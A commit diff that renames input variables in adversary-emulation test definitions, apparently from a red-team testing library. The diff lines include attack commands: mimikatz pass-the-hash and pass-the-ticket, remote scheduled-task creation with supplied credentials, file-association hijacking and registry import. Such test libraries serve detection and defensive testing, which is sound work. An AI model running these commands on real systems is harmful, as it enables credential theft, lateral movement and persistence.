Technique fixes

Fixed techniques per Issue #317
2018-08-31 07:59:05 -04:00
parent 7d8b526bd8
commit b2dda75932
5 changed files with 8 additions and 7 deletions
@@ -21,4 +21,4 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      cmd.exe assoc #{extension_to_change}="#{thing_to_execute}"
+      cmd.exe assoc #{extension_to_change}="#{target_exenstion_handler}"
@@ -35,6 +35,7 @@ atomic_tests:
    name: command_prompt
    command: |
      SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
+
 - name: Scheduled task Remote
  description: |
      Create a task on a remote system
@@ -65,4 +66,4 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      SCHTASKS /Create /S #{target} /RU #{UserName} /RP #{Password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
+      SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
@@ -12,7 +12,7 @@ atomic_tests:
    - windows

  input_arguments:
-    user:
+    user_name:
      description: username
      type: string
      default: Administrator
@@ -28,7 +28,7 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      mimikatz # sekurlsa::pth /user:#{user} /domain:#{domain} /ntlm:#{ntlm}
+      mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}

 - name: Mimikatz Kerberos Ticket Attack
  description: |
@@ -40,4 +40,4 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      mimikatz # kerberos::ptt #{username}@#{Domain}
+      mimikatz # kerberos::ptt #{user_name}@#{domain}
@@ -18,4 +18,4 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      reg.exe import #{file_name}
+      reg.exe import #{registry_file}
@@ -19,7 +19,7 @@ atomic_tests:
  executor:
    name: command_prompt
    command: |
-      net time \\#{computername}
+      net time \\#{computer_name}
      w32tm /tz

 - name: System Time Discovery - PowerShell